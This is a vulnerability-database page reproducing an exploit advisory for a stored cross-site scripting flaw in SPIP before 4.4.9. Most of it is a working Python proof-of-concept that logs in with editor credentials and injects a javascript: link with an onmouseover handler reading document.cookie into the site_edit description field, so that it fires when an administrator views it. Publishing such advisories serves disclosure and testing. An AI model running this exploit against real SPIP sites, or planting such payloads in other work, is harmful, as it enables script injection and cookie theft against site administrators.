Vulners
Lucene search
📄 SPIP Cross Site Scripting
=============================================================================================================================================
| # Title : SPIP before 4.4.9 Stored XSS Injection After Authentication |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.spip.net/en_rubrique25.html |
=============================================================================================================================================
[+] Summary : This Python script uses the requests library to establish an HTTP session and attempt authentication against a website running SPIP using editor-level credentials.
After successful login, the script sends a POST request to the site editing endpoint (?exec=site_edit) to inject a JavaScript payload into the descriptif field.
The payload consists of an <a> tag containing:
A javascript: URI in the href attribute
An onmouseover event handler
A call attempting to access document.cookie
The objective is to test for a potential Stored Cross-Site Scripting (Stored XSS) vulnerability if the platform fails to properly sanitize input (e.g., via echappe_anti_xss()).
Workflow:
Create an HTTP session.
Send login credentials.
If authentication succeeds, submit malicious input to a content field.
Check the server response for injected content to determine whether the payload was accepted.
This script represents a security testing scenario intended to verify the presence of a Stored XSS vulnerability in the SPIP administration interface.
[+] POC :
import requests
target_url = "http://example-spip-site.com/ecrire/?exec=site_edit"
login_url = "http://example-spip-site.com/spip.php?page=login"
username = "redacteur_user"
password = "password123"
payload = '<a href="javascript:alert(\'XSS_Exploited\')" onmouseover="console.log(document.cookie)">Technical Info</a>'
session = requests.Session()
login_data = {
'var_lang': 'en',
'formulaire_action': 'login',
'login': username,
'password': password
}
print("[+] Attempting to log in...")
response = session.post(login_url, data=login_data)
if response.status_code == 200:
print("[+] Login successful. Starting the injection process...")
injection_data = {
'nom_site': 'Malicious Site',
'url_site': 'http://attacker.com',
'descriptif': payload,
'statut': 'publie'
}
submit_response = session.post(target_url, data=injection_data)
if "Technical Info" in submit_response.text:
print("[!] Injection successful! The code will execute when an admin views the site.")
else:
print("[-] Injection failed or was blocked by a security filter.")
else:
print("[-] Failed to log in.")
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Feb 2026 00:00Current
5Medium risk
Vulners AI Score5